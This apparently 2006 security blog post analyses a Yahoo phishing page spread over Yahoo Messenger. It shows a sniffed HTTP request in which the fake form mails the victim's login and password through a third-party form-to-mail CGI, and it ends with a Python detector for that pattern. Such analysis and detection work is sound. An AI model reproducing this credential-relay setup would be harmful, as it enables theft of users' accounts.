New Yahoo Phishing site

Just after I finished reading a story about a hacker who had defaced a lot of .gov.ph sites, my previous shiftmate popped me a message on Yahoo Messenger. He asked me if we had any new IM worm samples that use Yahoo Messenger. I told him none, not even a sample from the SOBER.AG anniversary links; then he immediately popped me the link http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/. He told me that his friend had popped him that link. Below is a snapshot of their correspondence in YM:




And below is the screenshot of the Yahoo Phishing site:


Yahoo Phishing Site

Here we are again, reminding Internet users to be cautious about the links they visit. As we can see in the image, the site pretends to be a Yahoo Photos site, but the URL shows it is a Geocities link. Always think twice before giving out any username and password on a website.


I sniffed the packets to find out where the Yahoo account credentials would be sent:

POST /form/mailto.cgi HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.<BLOCKED>.com/x0x_welcome_2006_x0x/?20068
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705)
Host: www2.<BLOCKED>.net
Content-Length: 175
Connection: Keep-Alive
Cache-Control: no-cache

Mail_From=Yahoo&Mail_To=<BLOCKED>.@yahoo.com&Mail_Subject=Yahoo+id&Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&login=qwerty&passwd=asdf&.save=Sign+In

HTTP/1.1 302 Found
Date: Sun, 08 Jan 2006 00:43:46 GMT
Server: Apache/1.3.26 (Unix) mod_perl/1.26
Location: http://photos.yahoo.com/ph//my_photos
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

As we can see, the Yahoo credentials are being sent to <BLOCKED>.@yahoo.com. The fake login form does not post to Yahoo at all: it submits to a form-to-mail CGI (mailto.cgi) on a third-party host, which emails the login and passwd fields to the Mail_To address and then redirects the victim (Next_Page, echoed in the 302 Location header) to the real Yahoo Photos page, so the victim sees nothing unusual.
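As an added example (not code from the original post), here is a small Python check that parses a captured POST like the one above and flags the three telltales of this pattern: login fields going to a host outside the brand's domain, a form-to-mail CGI that emails the fields to a Mail_To address, and a Next_Page redirect back to the real site. The hostnames and the recipient mailbox in the sample are constructed placeholders for the blocked values.

```python
from urllib.parse import parse_qs

# Constructed sample modelled on the sniffed POST in the post; the blocked
# hostnames and the recipient mailbox are placeholders, not the real values.
SAMPLE_REQUEST = (
    "POST /form/mailto.cgi HTTP/1.1\r\n"
    "Referer: http://www.example-blocked.com/x0x_welcome_2006_x0x/?20068\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Host: www2.example-blocked.net\r\n"
    "\r\n"
    "Mail_From=Yahoo&Mail_To=dropbox%40yahoo.com&Mail_Subject=Yahoo+id&"
    "Next_Page=http%3A%2F%2Fphotos.yahoo.com%2Fph%2F%2Fmy_photos&"
    "login=qwerty&passwd=asdf&.save=Sign+In"
)

CREDENTIAL_FIELDS = {"login", "passwd", "password", "username"}
FORM_MAIL_FIELDS = {"mail_to", "mail_from", "mail_subject", "next_page"}

def parse_http_request(raw):
    """Split a raw HTTP/1.1 request into method, path, headers and form fields."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    # parse_qs decodes %xx escapes and '+', so Mail_To and Next_Page become readable
    fields = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    return {"method": method, "path": path, "headers": headers, "fields": fields}

def credential_exfil_findings(raw, brand_domain="yahoo.com"):
    """Return human-readable findings for the form-to-mail credential theft pattern."""
    req = parse_http_request(raw)
    fields = req["fields"]
    names = {k.lower() for k in fields}
    host = req["headers"].get("host", "")
    on_brand = host == brand_domain or host.endswith("." + brand_domain)
    findings = []
    if names & CREDENTIAL_FIELDS and not on_brand:
        findings.append(f"login/password fields posted to foreign host {host}")
    if names & FORM_MAIL_FIELDS:
        findings.append(f"form-to-mail relay {req['path']} forwards the form to "
                        f"{fields.get('Mail_To', '?')}")
    nxt = fields.get("Next_Page", "")
    if brand_domain in nxt:
        findings.append(f"redirect to the real site hides the theft: {nxt}")
    return findings
```

Run it against a decoded request body from a proxy or packet capture; a legitimate Yahoo login posts to a yahoo.com host and carries no Mail_To field, so it produces no findings.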